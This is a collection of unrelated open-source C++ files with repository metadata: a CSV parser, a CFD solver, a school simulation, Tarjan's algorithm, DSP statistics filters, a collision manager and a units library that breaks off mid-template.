HasHeader() {return HasHeader;} protected: // -- CONST VARIABLES -- // const std::string FileName; ///< Name of the file to try and parse. This is given by the user // -- VARIABLES -- // std::ifstream InFile; ///< The read only file of the input file name unsigned HeaderRowNumber; ///< The row number of the header in the file std::vector<std::string> HeaderNames; ///< list of the header string names // bool HasHeader; ///< Indicates if a header row exsists private: unsigned FindHeaderRow() { std::string temp_line; // TODO: Assumed that the header was first. Need to add a finder to try and detect // TODO: Add in a BOM Detection String::getline(InFile, temp_line); String::Split<std::vector<std::string>>(temp_line, HeaderNames, ','); return 0; } }; class Reader : public Parser { public: Reader(const std::string filename) noexcept(false) : Parser(filename) { } bool NextLine(); protected: private: }; /*class dict { public: dict( void ) {} protected: private: };*/ }
ea73fef06a40f2b35bf9b6e0342154e263f1ac71
a06515f4697a3dbcbae4e3c05de2f8632f8d5f46
/corpus/taken_from_cppcheck_tests/stolen_14266.cpp
11bf722ab1e9e47adce596bce15fc34ded4a3d50
[]
no_license
pauldreik/fuzzcppcheck
12d9c11bcc182cc1f1bb4893e0925dc05fcaf711
794ba352af45971ff1f76d665b52adeb42dcab5f
refs/heads/master
2020-05-01T01:55:04.280076
2019-03-22T21:05:28
2019-03-22T21:05:28
177,206,313
0
0
null
null
null
null
UTF-8
C++
false
false
39
cpp
stolen_14266.cpp
void f() { extern int a; a++; }
c5ff6d0c79cc720d68cf4d410a36fae798e13769
d9409f4aca21b6add1090b453f59ae2d1bfc32a5
/src/main.cpp
1a98dea7c8cde856bcb444807a2a2bdea700d779
[]
no_license
hahnpv/CFDV
b50a8e8d16431db2aee6e7b2bdbf9bc03ccf9801
b85d8c68692d8e87ffe476f669a5550dbd10a343
refs/heads/master
2021-01-19T04:14:57.032455
2018-10-26T13:20:05
2018-10-26T13:20:05
60,426,019
0
0
null
null
null
null
UTF-8
C++
false
false
7,365
cpp
main.cpp
#include "mpi.h" //#ifdef __GNUC__ // #include <tr1/functional> /// ref wrapper (STL TR1 gcc) // using namespace std::tr1; //#else #include <functional> /// ref wrapper (STL TR1 msvc) // Floating Point Break on NaN (windows debugging) ///unsigned int fp_control_state = _controlfp(_EM_INEXACT, _MCW_EM); //#endif #include <algorithm> /// for_each // Configuration #include "MPIBinaryConfiguration.h" // Base Classes #include "FDV/Element.h" #include "FDV/Node.h" #include "FDV/FDVGalerkin.h" // Dirichlet BC #include "FDV/Function/ApplyBC.h" #include "FDV/Function/EnforceBC.h" // CFD Utility #include "FDV/Function/CalcLength.h" #include "FDV/Function/ClearElement.h" #include "FDV/Function/NodeUnpack.h" #include "FDV/Function/NodeCheck.h" #include "FDV/Function/MPI_CFL.h" #include "FDV/Function/FDVParam.h" // Input #include "Utility/IO/ASCIItoBinary/LoadBinary.h" // Sensors #include "Utility/Sensor.h" // Non-CFD #include <boost/timer.hpp> #include "Utility/Timer.h" #include "Utility/PrecisionTimer.h" // Mesh Refinement #include "adap/ElementAssociation.h" #include "adap/MeshRefine2D.h" #include "adap/RefineListAdaptive.h" // attempt at true adaption based on s1 parameter // Test #include "FDV/Function/AxisymmetricFlow.h" #include "boost/program_options.hpp" namespace po = boost::program_options; using namespace std; po::variables_map add_program_options(int argc, char * argv[]) { // program option variable map po::options_description desc("Command Line Parameters:"); desc.add_options() ("path", po::value<std::string>(), "Path to CFD case") ("adap", po::bool_switch()->default_value(false), "Grid Adaptation flag") ; po::positional_options_description p; p.add("path", -1); po::variables_map vm; po::store(po::command_line_parser(argc, argv).options(desc).positional(p).run(), vm); po::notify(vm); if (argc <= 1) { cout << desc << endl; cout << "The Flowfield Dependent Variation (FDV) method is a numerical scheme" << endl << "built to simulate flows characterized by multiple speeds, multiple " << endl << "physical phenomena, and large variations in flow variables." << endl << "Written by Dr. Philip Hahn, derived from Dr. T.J. Chung's textbook " << endl << "'Computational Fluid Dynamics, 2nd Ed.' and courses CFD I,II,III at " << endl << "The Univerisity of Alabama in Huntsville." << endl << endl << "hahnpv@gmail.com" << endl << endl << "'You will never forget.' -Dr. Chung" << endl; } return vm; } // 3. Find unifications between 2D and 3D if any // Still some hardcoded stuff that needs to be generalized. int main(int argc, char *argv[]) { po::variables_map vm = add_program_options(argc, argv); if (argc <= 1) return 0; double t = 0; double dt = 0; std::vector< Node *> nodes; std::vector< Element *> elements; MPIBinaryConfiguration * config = new MPIBinaryConfiguration(argc, argv, vm, elements, nodes, vm["path"].as<std::string>()); int iter = config->cm["iter"].as<int>(); double cfl = config->cm["cfl"].as<double>(); /// Prescribed CFL number int itermax = config->cm["itermax"].as<int>(); /// Maximum number of time iterations int nnod = config->cm["nnod"].as<int>(); /// Number of nodes per finite element int neqn = config->cm["neqn"].as<int>(); /// Number of equations per node int ndim = config->cm["ndim"].as<int>(); /// Number of dimensions int nface = config->cm["nface"].as<int>(); /// Number of faces int nbnod = config->cm["nbnod"].as<int>(); /// Number of boundary nodes cout << "nodes/eles: " << nodes.size() << " " << elements.size() << endl; CalcLength<Element *> cl(ndim, nnod); for_each(elements.begin(), elements.end(), ref( cl)); // calculate characteristic length Sensor * sensors = new Sensor(vm["path"].as<std::string>() + "//sensors", ndim, nodes); // Select equations to solve NavierStokes * NS; if (ndim == 1) NS = new NavierStokes1D; else if (ndim == 2) NS = new NavierStokes2D; else NS = new NavierStokes3D; // can move somewhere else? its a mess here IterationTimer timer(config->rank); ofstream tout("timeloop.csv",ios::out); cout << "time loop" << endl; PrecisionTimer timer_l; timer_l.start(); /// MESH REFINEMENT /// if (vm["adap"].as<bool>()) { cout << "Performing grid refinement..." << endl; for_each(nodes.begin(), nodes.end(), NodeUnpack<Node *>()); /// extract nodes for_each(nodes.begin(), nodes.end(), NodeCheck<Node *>()); /// check for invalid nodal values std::vector<int> elelist; // elements to be refined std::vector<int> refine_level; // breakpoints for each level refine AdaptiveRefineList<Element, Node>(elelist, refine_level, elements, nodes, nnod, nface); MeshRefine2D<Element, Node>(elements, nodes, elelist, refine_level, ndim, neqn, nnod, iter, nface); cout << "Done adapting mesh" << endl; for_each(nodes.begin(), nodes.end(), NodeUnpack<Node *>()); /// extract nodes for_each(nodes.begin(), nodes.end(), NodeCheck<Node *>()); /// check for invalid nodal values config->Save(elements, nodes, iter); // TODO add updated config files? return 0; } config->Save(elements, nodes, iter); // TODO add updated config files? /// CFD Integration /// for (; iter < itermax; iter++) { if (config->rank == 0) cout << " t = " << t << ", iteration " << iter << endl; timer.reset(); for_each(elements.begin(), elements.end(), ClearElement<Element *>()); /// Clear matrices in each element for_each(nodes.begin(), nodes.end(), NodeUnpack<Node *>()); /// extract nodes for_each(nodes.begin(), nodes.end(), NodeCheck<Node *>()); /// check for invalid nodal values if (config->rank == 0) sensors->update(iter); // FIXME: this means rank 0 has all nodes!? if (iter % 1000 == 0) config->Save(elements, nodes, iter); // TODO add updated config files? CFL<Element *>(elements, cfl, dt); /// Update CFL number if (config->rank == 0) cout << "dt: " << dt << endl; if (iter % 100 == 0 ) config->Output(elements, nodes, iter, t, true); /// Tecplot output, deprecate for Save FDVGalerkin<Element *> fdv(nnod, neqn, ndim, nbnod, dt, NS); for_each(elements.begin(), elements.end(), ref(fdv)); if (config->cm["axi"].as<bool>()) { cout << "Processing 2D mesh as axisymmetric" << endl; // until you validate for_each(elements.begin(), elements.end(), AxisymmetricFlow<Element *>(neqn, nnod)); /// Axisym 2pi } for_each(elements.begin(), elements.end(), ApplyBC<Element *>(neqn, nnod, ndim, nbnod)); /// FIXME this doesn't work at all config->gmres->iterate(elements); /// Solve via GMRES config->gmres->update(nodes); config->RMSErr(t, iter); /// Calculate residuals FIXME for adap grids t += dt; timer_l.stop(); if(config->rank == 0) cout << "time: " << timer_l.read() << endl; timer.check(iter, t, dt); } config->Save(elements, nodes, iter); // TODO add updated config files? delete sensors; delete config; delete NS; return 0; }
ee0ef83dfcb1a8171f87a7b7fe82497e5da3763c
1a2190b96ca17719d2b41a5fbcac6043cf9f08e4
/Codeforces/#42/a.cpp
a9f851dcc9dd544b51856762fe21138b88372648
[]
no_license
eliasm2/problem-solving
13c1abbf397bb41683fccb3490b0113c36ce9010
15becf49315b5defb8c1267e0c43ce1579dcae1a
refs/heads/master
2020-09-07T07:12:17.112311
2018-07-20T17:27:43
2018-07-20T17:27:43
null
0
0
null
null
null
null
UTF-8
C++
false
false
489
cpp
a.cpp
#include <iostream> #include <string> #include <map> using namespace std; int main(){ ios::sync_with_stdio( false ); int n; string result; map< string, int >goal; map< string, int >::iterator it; goal.clear(); cin >> n; for( int j = 0; j < n; j++ ){ cin >> result; goal[result]++; } int max = -1; it = goal.begin(); while( it != goal.end() ){ if( it->second > max ) { max = it->second; result = it->first; } it++; } cout << result << "\n"; return 0; }
125bdb4efbc0a7a5f1cd924fb2f5299d4b8f2862
8bc42341e92e544d975e3117390f1230fa08fe85
/src/main.cpp
a746f23e109d86f35fd4c7ea377e42cd51090328
[]
no_license
linachris/School-simulation
8582893ac75a5e358a95dcd4943d8f56c486fe6c
e1df1eefe74305d90808166f9a26c5c2418bcae2
refs/heads/master
2023-06-21T19:48:51.046147
2021-07-19T10:34:35
2021-07-19T10:34:35
387,426,090
0
0
null
null
null
null
UTF-8
C++
false
false
3,805
cpp
main.cpp
#include <iostream> #include <time.h> #include "ids.hpp" #include "school.hpp" using namespace std; // return a random number between [1,num_of_students] inline unsigned int random_students_index(int num_of_students) { return rand() % num_of_students + 1; } // return a random number between [0,num_of_teachers] inline unsigned int random_teacher_index(int num_of_teachers) { return rand() % (num_of_teachers + 1); } // suffling and array of students inline void shuffle(Student** array, int n) { for (int i = 0; i < n; i++) { int j = i + rand() / (RAND_MAX / (n - i) + 1); Student* t = array[j]; array[j] = array[i]; array[i] = t; } } // suffling and array of teachers inline void shuffle(Teacher** array, int n) { for (int i = 0; i < n; i++) { int j = i + rand() / (RAND_MAX / (n - i) + 1); Teacher* t = array[j]; array[j] = array[i]; array[i] = t; } } int main(int argc, char const *argv[]) { srand(time(NULL)); if (argc != 5) { cerr << "\nError!\nCorrect Usage:" << argv[0] << " <Classroom capacity> <Yard capacity> <Stairs capacity> <Corridor capacity> " << endl; return 1; } unsigned int Cclass = atoi(argv[1]); unsigned int Cyard = atoi(argv[2]); unsigned int Cstair = atoi(argv[3]); unsigned int Ccorr = atoi(argv[4]); // Let's say : Entering School Students:36 and Teachers:18(1 for each classroom). // Each classroom will hold 2 students // Initialize the array now, and shuffle after Student** students = new Student*[36]; for (unsigned int i = 0; i < 36 ; i++) students[i] = new Student(studentInfo[i].name, studentInfo[i].floor_num, studentInfo[i].clsr_num); cout << endl; Teacher** teachers = new Teacher*[18]; for (unsigned int i = 0; i < 18; i++) teachers[i] = new Teacher(teacherInfo[i].name, teacherInfo[i].floor_num, teacherInfo[i].clsr_num); cout << endl; // shuffling the arrays, for students and teachers to enter/place school randomly shuffle(students, 36); shuffle(teachers, 18); // creating a school, for students and teachers to enter School* school = new School(Cclass, Cyard, Cstair, Ccorr); unsigned int num_of_students = 36; unsigned int num_of_teachers = 18; unsigned int stud_index = 0, teach_index = 0; while ((num_of_students != 0) && (num_of_teachers != 0)) { // random amount of students and teachers enter school/are placed in classrooms // and since the arrays are suffled, random students/teachers enter too unsigned int rand_studs_enter = random_students_index(num_of_students); unsigned int rand_teach_enter = random_teacher_index(num_of_teachers); // students enter school and try to reach their classroom. // if there's in no space somewhere, students wait there till it's freed up school->enter(students, stud_index, rand_studs_enter); // teachers are placed in their classroom - (if !=0) for (unsigned int i = teach_index; i < rand_teach_enter; i++) school->place(teachers[i]); num_of_students -= rand_studs_enter; // update students left to enter num_of_teachers -= rand_teach_enter; // update teachers left to place stud_index += rand_studs_enter; // update the index of the array of students left to enter teach_index += rand_teach_enter; // update the index of the array of teachers left to enter } cout << "\nPrinting School:...\n"; school->print(); delete school; for (unsigned int i = 0; i < 18; i++) delete teachers[i]; delete[] teachers; for (unsigned int i = 0; i < 36; i++) delete students[i]; delete[] students; return 0; }
9883cc8179d6180f84d27cfe6d28b7b37526e19c
9a3e96870776bdb4dab299d65520318074a171f9
/cskynet/cskynet/kernel/monitorthread.cpp
b8462251c46d8dea3c798e4ba66e98929f43e37a
[]
no_license
panlibin/skynetwithlibco
ae99dac303f6b0789975844a157b413c9701ccec
1dad5f828754d4931a4c0d30bb833c2264f125f4
refs/heads/master
2021-01-20T02:42:51.361240
2017-05-05T10:04:04
2017-05-05T10:04:04
89,446,032
0
0
null
null
null
null
UTF-8
C++
false
false
516
cpp
monitorthread.cpp
#include "../common/common.h" #include "monitor.h" #include "monitorthread.h" #include "servicemanager.h" using namespace csn; MonitorThread::MonitorThread(Monitor* pMonitor) : m_pMonitor(pMonitor) { } void MonitorThread::run() { int32_t i = 0; for (;;) { if (g_ServiceManager.getServiceCount() == 0) break; m_pMonitor->check(); for (i = 0; i < 5; ++i) { if (g_ServiceManager.getServiceCount() == 0) break; sleep(1); } } }
1c8509e1550a93b174b91aed29b479e1a6efc65c
4d2381892fa2f5a31731a2567ddccd0b6b2922f6
/STL/maps.cpp
005f3e2005eaf6a7b88c456b6f697dfd58792dc4
[]
no_license
gaurav-singh1998/Cpp_practice_questions
e888e98b21d2a1386e5460e11b1139eccdcda801
c4ab90fa797e4449249e6562c3d626abfeb675d5
refs/heads/master
2021-05-22T20:12:31.219285
2020-10-03T07:07:50
2020-10-03T07:07:50
253,075,063
0
0
null
null
null
null
UTF-8
C++
false
false
784
cpp
maps.cpp
#include<bits/stdc++.h> using namespace std; int main() { // maps in C++ are of two types // [a] Unordered Map:- Uses separate chaining technique with hash function // useful to keep elements in unsorted order has a time complexity of O(1) // to search an element; // [b] Map:- Uses Balanced BST of red-black tree, useful to keep // values of (key, value) pair in sorted order has a time complexity of // O(logn) to element; // unordered_map<string, int> m; m["mango"] = 100; m.insert(make_pair("Apple", 120)); if(m.count("Apple")==1) { cout << m["Apple"] << endl; } auto it = m.find("mango"); if(it!=m.end()) { cout << (it->second) << endl; } // to delete m.erase("mango"); }
86bc5370f9537a4ac5d3df7c396e324d774852bb
d41c430ec554f4a7c6ffed88440eb179c478d8df
/DspLib/dspFilterStatistics.cpp
97a84f060447cae5d1864f14f114eb780cac1579
[ "MIT" ]
permissive
chrishoen/Dev_DspLib
d8035071c8a9b49bbb193e9157f557379f63ca36
030b8a4890fd89ad618a31abefdc302d7ed8892c
refs/heads/master
2022-11-22T05:43:05.783518
2022-11-04T17:21:53
2022-11-04T17:21:53
144,871,706
1
0
null
null
null
null
UTF-8
C++
false
false
6,997
cpp
dspFilterStatistics.cpp
/*============================================================================== Description: ==============================================================================*/ //****************************************************************************** //****************************************************************************** //****************************************************************************** #include "stdafx.h" #include "dspFilterStatistics.h" namespace Dsp { namespace Filter { //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** AlphaStatistics::AlphaStatistics() { // Output values mX = 0.0; mEX = 0.0; mUX = 0.0; mVariance = 0.0; mMean = 0.0; mStdDev = 0.0; mK = 0; } void AlphaStatistics::initialize(double aAlpha) { mXAlpha.initialize(aAlpha); mXSquareAlpha.initialize(aAlpha); mX = 0.0; mEX = 0.0; mUX = 0.0; mVariance = 0.0; mMean = 0.0; mStdDev = 0.0; mK = 0; } //****************************************************************************** //****************************************************************************** //****************************************************************************** void AlphaStatistics::put(double aX) { // These result in moving averages of X and X squared mXAlpha.put(aX); mXSquareAlpha.put(aX*aX); // X mX = aX; // Expectation (mean) of X mEX = mXAlpha.mXX; // Variance of X mVariance = mXSquareAlpha.mXX - mEX*mEX; // Uncertainty (stddev) of X if (mVariance > 0.0f) { mUX = sqrt(mVariance); } else { mUX = 0.0f; } // Nicknames mMean = mEX; mStdDev = mUX; // Update mK++; } //****************************************************************************** //****************************************************************************** //****************************************************************************** void AlphaStatistics::show() { printf("%3d %8.3f %8.3f %8.3f\n", mK, mX, mEX, mUX); } //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** //****************************************************************************** void PeriodicStatistics::initialize(int aSize) { mSize = aSize; mFirstFlag = true; mX = 0.0f; mEndOfPeriod = false; mEX = 0.0f; mUX = 0.0f; mMean = 0.0f; mStdDev = 0.0f; mMinX = 0.0f; mMaxX = 0.0f; mXSum = 0.0f; mXSquareSum = 0.0f; mCurrentMinX = 0.0f; mCurrentMaxX = 0.0f; mPutCount = 0; mK = 0; } //****************************************************************************** //****************************************************************************** //****************************************************************************** void PeriodicStatistics::put(float aX) { //*************************************************************************** //*************************************************************************** //*************************************************************************** // Store current input mX = aX; //*************************************************************************** //*************************************************************************** //*************************************************************************** // Update min and max // If first in period, set to current input if (mFirstFlag) { mFirstFlag = false; mCurrentMinX = mX; mCurrentMaxX = mX; } // Else, calculate min and max else { if (mX < mCurrentMinX) mCurrentMinX = mX; if (mX > mCurrentMaxX) mCurrentMaxX = mX; } //*************************************************************************** //*************************************************************************** //*************************************************************************** // Update sums mXSum += aX; mXSquareSum += aX*aX; //*************************************************************************** //*************************************************************************** //*************************************************************************** // If at the end of the period if (++mPutCount == mSize) { // Calculate results for mean and standard deviation // Expectation (mean) of X mEX = mXSum / mPutCount; // Expectation of X squared mEXSquare = mXSquareSum / mPutCount; // Variance of X mVariance = mEXSquare - mEX*mEX; // Uncertainty (stddev) of X if (mVariance > 0.0f) { mUX = sqrtf(mVariance); } else { mUX = 0.0f; } // Store mMean = mEX; mStdDev = mUX; // Latch minimum and maximum mMinX = mCurrentMinX; mMaxX = mCurrentMaxX; // Reset sums and counts mXSum = 0.0;; mXSquareSum = 0.0; mPutCount = 0; // Indicate end of period mEndOfPeriod = true; mFirstFlag = true; } else { // Indicate not end of period mEndOfPeriod = false; } //*************************************************************************** //*************************************************************************** //*************************************************************************** // Done mK++; } //****************************************************************************** //****************************************************************************** //****************************************************************************** void PeriodicStatistics::show() { if (mEndOfPeriod) { printf("%3d %8.3f $$ %8.3f %8.3f %8.3f %8.3f\n", mK, mX, mEX, mUX, mMinX, mMaxX); } else { printf("%3d %8.3f\n", mK, mX); } } //****************************************************************************** //****************************************************************************** //****************************************************************************** }//namespace }//namespace
789415ae0a5c38d731012f4a379232713b304ae5
648e3e20b857431eb2b4e4a6dd8f1070cc7f8be6
/firmware/z_retired/node_setup.h
41507cc4af3f5e205734a94dc949f7a3c5717b93
[]
no_license
NGenetzky/particle-projects
b9491112440f6a221075cb6e239bc7e3dbfc111b
d3817385a66c229aa8a0adf2d3aec6a1ddb65739
refs/heads/master
2021-01-17T17:38:27.777813
2017-10-02T00:32:31
2017-10-02T00:32:31
60,393,966
0
0
null
null
null
null
UTF-8
C++
false
false
1,869
h
node_setup.h
#include "application.h" #include "node.h" const int NODE_SERIAL_START = 200; namespace NODE_V1 { int node_setup(Id node = NODE_SERIAL_START); // namespace WREG { int wreg_set(const char *); int get_wreg(); int post_wreg(const char *); // } namespace WREG // namespace RGB { int rgb_set(const char *); int get_rgb(); // } namespace RGB // // namespace WREG { // int wreg_set(const char *)); // // Return the cached value of wreg. Check that it is the same value. // int get_wreg(); // int post_wreg(const char *)); // // } namespace WREG } // End NODE_V1 // EOF // int node_setup(){ // int i = NODE_SERIAL_START; // node_set(++i, "wreg"); // add_put(i, wreg_set); // // Return the cached value of wreg. Check that it is the same value. // cmd_set(i, "wreg", get_wreg); // add_post(++i, post_wreg); // node_set(++i, "led"); // // Set the RGB color and cache what value it was. // add_put(i, put_led); // // Before: Output the pinMode of D7 and current value. // // After: Output the last value set. Check that is is same as current value. // cmd_set(i, "led", get_led); // node_set(++i, "rgb"); // // Set the RGB color and cache what value it was. // add_put(i, put_rgb); // // Before: Output the status of rgb. // // After: Output the current value. // cmd_set(i, "rgb", get_rgb); // node_set(++i, "serial0"); // // Should set the baud rate and enable. // add_put(i, put_serial0); // // Before: This should inform the serial to call a set with args "baudrate". // cmd_set(i, "serial0", get_serial0); // add_post(++i, post_serial0); // node_set(++i, "serial1"); // add_put(i, put_serial1); // cmd_set(i, "serial1", get_serial1); // add_post(++i, post_serial1); // return i - NODE_SERIAL_START; // }
7fd4fef23d76f0537d1d9b5c5c87f783c6206cd9
cfebe38545522d29a7b8b7346394c266bbbb87f7
/Pub-3/Pub-3/Kinanti.cpp
0c45feb6f585b86cc4ff67abfff5d1f8d1a639b9
[]
no_license
Yancale/CPP_Projects
c146058bb5d45b36b14965818ce10e65fbb007d1
7274278d41b304235ed6c58db3e23510ab8ea913
refs/heads/master
2021-01-18T03:22:20.213928
2017-03-22T16:07:00
2017-03-22T16:07:00
85,826,859
0
0
null
null
null
null
UTF-8
C++
false
false
479
cpp
Kinanti.cpp
#include "stdafx.h" #include "Kinanti.h" Kinanti::Kinanti(int year) { m_year = year; } string Kinanti::getName() { string a = "\"Kinanti (year "; a += to_string(m_year); a += ")\""; return a; } void Kinanti::prepare() { cout << "you ordered Kinanti.\n" << "so the story about this red wine started at " << m_year << ".\n All this time it waited for you to drink it in a room tempature. enjoy!" << endl; } int Kinanti::getYear() { return m_year; } Kinanti::~Kinanti() { }
bd60b501538925383f1a4617d70fdcdee3f1878a
2239b76447f477551d6e85bcaff0b81beac64067
/resources/StringSplit.h
144a2fbd0640c8cb63c80d8c7cc1389d5bfebc75
[]
no_license
vaetern/cpp_study
9c4a179a5079bc93140b6285023aabb29c9e7221
8fba8714e6d620b07e0b03ed163a4db2daecf3e3
refs/heads/master
2020-04-18T14:00:11.710819
2019-02-06T17:42:06
2019-02-06T17:42:06
167,577,119
0
0
null
null
null
null
UTF-8
C++
false
false
269
h
StringSplit.h
#ifndef UNTITLED_STRINGSPLIT_H #define UNTITLED_STRINGSPLIT_H #pragma once #include <string> #include <vector> using namespace std; class StringSplit { public: vector<string> Split(const string &subject, const char &delim); }; #endif //UNTITLED_STRINGSPLIT_H
09143845aba03882a28d37f76f170774f9160116
c32ca8180847b209e24e8d1d5ae87f88cda172cc
/hvn3/include/hvn3/collision/CollisionManager.h
a37116493206b4717950a04882ebce73a3036e2f
[]
no_license
gsemac/hvn3-engine
051ffe6dd8fd07a95fdb3937013ad3bdc805dddc
7f99f6a0cc67aae7e5e5ec5a4c08a2a688f0ee0a
refs/heads/master
2021-07-24T12:04:42.773197
2019-03-06T21:50:52
2019-03-06T21:50:52
98,023,277
5
0
null
null
null
null
UTF-8
C++
false
false
1,047
h
CollisionManager.h
#pragma once #include "hvn3/collision/CollisionManagerBase.h" #include "hvn3/collision/Collider.h" namespace hvn3 { class CollisionManager : public CollisionManagerBase { protected: using CollisionManagerBase::CollisionManagerBase; void CheckPairs(const IBroadPhase::collider_pair_vector_type& pairs) override { // Clear the last update's list of colliding pairs. this->GetPairs().clear(); for (auto i = pairs.begin(); i != pairs.end(); ++i) { ICollider* body_1 = i->first; ICollider* body_2 = i->second; CollisionResult m; if (!Narrow().TestCollision(body_1, body_2, m)) continue; // Call the collision event for the first object. if (body_1->Filter().MaskBits() & body_2->Filter().CategoryBits()) body_1->OnCollide(body_2); // Call the collision event for the second object. if (body_2->Filter().MaskBits() & body_1->Filter().CategoryBits()) body_2->OnCollide(body_1); // Add the pair to the list of collisions. this->GetPairs().push_back(m); } } }; }
7c2c6f615bac6052e37e2c98e87e6b6d8e8416a8
4da47bddc4d6770c81424df5f973c7d8bf77bc18
/6_Strong_Connectivity/Tarjans.cpp
9a204c2afc0f69d4453a77f4e17d44828fc6df07
[ "MIT" ]
permissive
SAKSHAM-SAAM/Graphs-algorithms
3ae37c3df5cac2914d3e658294e63aa2dc011bf2
9aeebb04bb8d9b0d90aab02e4c322d7f67cbc6ff
refs/heads/main
2023-04-29T14:18:19.630059
2021-05-19T07:13:33
2021-05-19T07:13:33
366,945,209
1
0
null
null
null
null
UTF-8
C++
false
false
1,372
cpp
Tarjans.cpp
// Tarjans Algorithm for Strongly Connected Componenets #include<bits/stdc++.h> using namespace std; void util(vector<int> adj[],int cur,vector<int> &disc,vector<int> &low,vector<bool> &inStk,stack<int> &stk) { static int time=0; disc[cur]=low[cur]=++time; stk.push(cur); inStk[cur]=true; vector<int>::iterator i; for(i=adj[cur].begin(); i!=adj[cur].end();++i) { int v=*i; if(disc[v]==-1) { util(adj,v,disc,low,inStk,stk); low[cur]=min(low[cur],low[v]); } else if(inStk[v]==true) { low[cur]=min(low[cur],disc[v]); } } int w=0; if(low[cur] == disc[cur]) { while(stk.top()!=cur) { w=stk.top(); stk.pop(); inStk[w]=false; cout<<w<<" "; } w=stk.top(); stk.pop(); inStk[w]=false; cout<<w<<"\n"; } } void tarjans(vector<int> adj[],int V) { vector<int> disc(V,-1); vector<int> low(V,-1); vector<bool> inStk(V,false); stack<int> stk; for(int i=0;i<V;i++) { if(disc[i]==-1) util(adj,i,disc,low,inStk,stk); } } int main() { int V,E; cin>>V>>E; vector<int> adj[V]; int a,b; while(E--) { cin>>a>>b; adj[a].push_back(b); } tarjans(adj,V); return 0; }
8981459322badfbe002cb1a2c9a5fd9e1b6ae709
5521c88ebfc7124c33850283bf07d50d7ed0f837
/TTVS/AnimationPlayer.h
43e85565e347c85f4bce76d120439caede83018a
[ "Apache-2.0" ]
permissive
amorstoic/Crystal.TTVS
082ae535e30b74e67bdec840d129cf5e89227f58
9e6c86566bfacf4fc571ad7b1308bcb7382bb213
refs/heads/master
2022-12-06T04:16:46.906529
2020-08-17T17:41:03
2020-08-17T17:41:03
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,519
h
AnimationPlayer.h
#ifndef _CST_ANIMATION_PLAYER_H_ #define _CST_ANIMATION_PLAYER_H_ #include "TalkingHead.h" /// /// @brief The player for playing the Talking Head animation /// class CSTHEAD_API AnimationPlayer { public: /// /// @brief Playing status /// enum STATUS { IDLE=0, PLAY=1, CALL_PAUSE=2, PAUSED=3, CALL_STOP=4 }; public: AnimationPlayer(TalkingHead *pHead, void* hWnd); ///< Constructor virtual ~AnimationPlayer(); ///< Destructor public: bool play(); ///< Begin the animation play void pause(); ///< Pause the animation play void resume(); ///< Resume the animation play void stop(); ///< Stop the animation play STATUS getStatus(); ///< Return the playing status protected: static unsigned long _stdcall animateProcedure(void *pParam); ///< The procedure for animation thread protected: void playAnimation(); ///< Main procedure for animation void dispatchMessage(); ///< Process the message dispatching void updateWindow(void *hWnd); ///< Update the window displaying void synchronize(int initFPS=0); ///< Synchronize the animation player protected: TalkingHead *m_pTalkingHead; ///< Handle to the talking head module void *m_hWnd; ///< Window handle for updating the animation int m_PlayStatus; ///< Playing status of the player }; #endif//_CST_ANIMATION_PLAYER_H_
e9a6095ae8ffba32b6edda35b4e841f8bb3c1808
c4059f063d538adbab4f7a44f8ec2638ff2ab40a
/AppCode/Source/Liberate/LiberateGameStateBase.cpp
bf1a6aff97743525a4037e6322a57261ce120b09
[]
no_license
JamesJarrold/Liberate
602578d59b93678144bcb5056f4ba99b24a057d0
b92dfc86a3e6ac47334163ce88e0716f89573027
refs/heads/master
2022-04-18T17:16:57.268014
2020-03-13T15:43:11
2020-03-13T15:43:11
232,807,521
2
0
null
null
null
null
UTF-8
C++
false
false
594
cpp
LiberateGameStateBase.cpp
// Fill out your copyright notice in the Description page of Project Settings. #include "LiberateGameStateBase.h" #include "UnrealNetwork.h" ALiberateGameStateBase::ALiberateGameStateBase() { bNetLoadOnClient = true; TotalRegions = 0; CompletedRegions = 0; } void ALiberateGameStateBase::GetLifetimeReplicatedProps(TArray<FLifetimeProperty>& OutLifetimeProps) const { Super::GetLifetimeReplicatedProps(OutLifetimeProps); DOREPLIFETIME(ALiberateGameStateBase, TotalRegions); DOREPLIFETIME(ALiberateGameStateBase, CompletedRegions); DOREPLIFETIME(ALiberateGameStateBase, Regions); }
37764800b70bccaad6392ec953f38868f147e26e
14fb9655f0cee1b821d64ba38ed843b05017ab14
/units.hpp
b8c90824d72f46caedd00007fe789590b25ef997
[ "MIT" ]
permissive
facontidavide/CppUnits11
e5e1ce93646d41f9a826431f744da57964a691f6
36c71782b825f884abb35e35f9f81ccf27ca3348
refs/heads/master
2021-08-30T01:40:44.727204
2017-12-15T15:43:48
2017-12-15T15:43:48
114,385,939
2
0
null
null
null
null
UTF-8
C++
false
false
16,862
hpp
units.hpp
#pragma once #include <ratio> #include <cmath> namespace Units{ namespace internal { struct BaseQuantity{}; // The "RQuantity" class is the prototype template container class, that just holds a double value. The // class SHOULD NOT BE INSTANTIATED directly by itself, rather use the quantity types defined below. template<typename MassDim, typename LengthDim, typename TimeDim, typename QAngleDim> class RQuantity { private: double value; constexpr RQuantity() : value(0.0) {} constexpr RQuantity(double val) : value(val) {} public: constexpr RQuantity(double val, BaseQuantity) : value(val) {} // The intrinsic operations for a quantity with a unit is addition and subtraction constexpr RQuantity const& operator+=(const RQuantity& rhs) { value += rhs.value; return *this; } constexpr RQuantity const& operator-=(const RQuantity& rhs) { value -= rhs.value; return *this; } // Returns the value of the quantity in multiples of the specified unit constexpr double Convert(const RQuantity& rhs) const { return value / rhs.value; } // returns the raw value of the quantity (should not be used) constexpr double getValue() const { return value; } }; template <typename M, typename L, typename T, typename A> constexpr internal::RQuantity<M, L, T, A> operator+(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return RQuantity<M, L, T, A>(lhs.getValue() + rhs.getValue(), internal::BaseQuantity()); } template <typename M, typename L, typename T, typename A> constexpr internal::RQuantity<M, L, T, A> operator-(const RQuantity<M, L, T, A>& lhs, const RQuantity<M, L, T, A>& rhs) { return RQuantity<M, L, T, A>(lhs.getValue() - rhs.getValue()); } template <typename M1, typename L1, typename T1, typename A1, typename M2, typename L2, typename T2, typename A2> constexpr RQuantity<std::ratio_add<M1, M2>, std::ratio_add<L1, L2>, std::ratio_add<T1, T2>, std::ratio_add<A1, A2>> operator*(const RQuantity<M1, L1, T1, A1>& lhs, const RQuantity<M2, L2, T2, A2>& rhs) { return RQuantity<std::ratio_add<M1, M2>, std::ratio_add<L1, L2>, 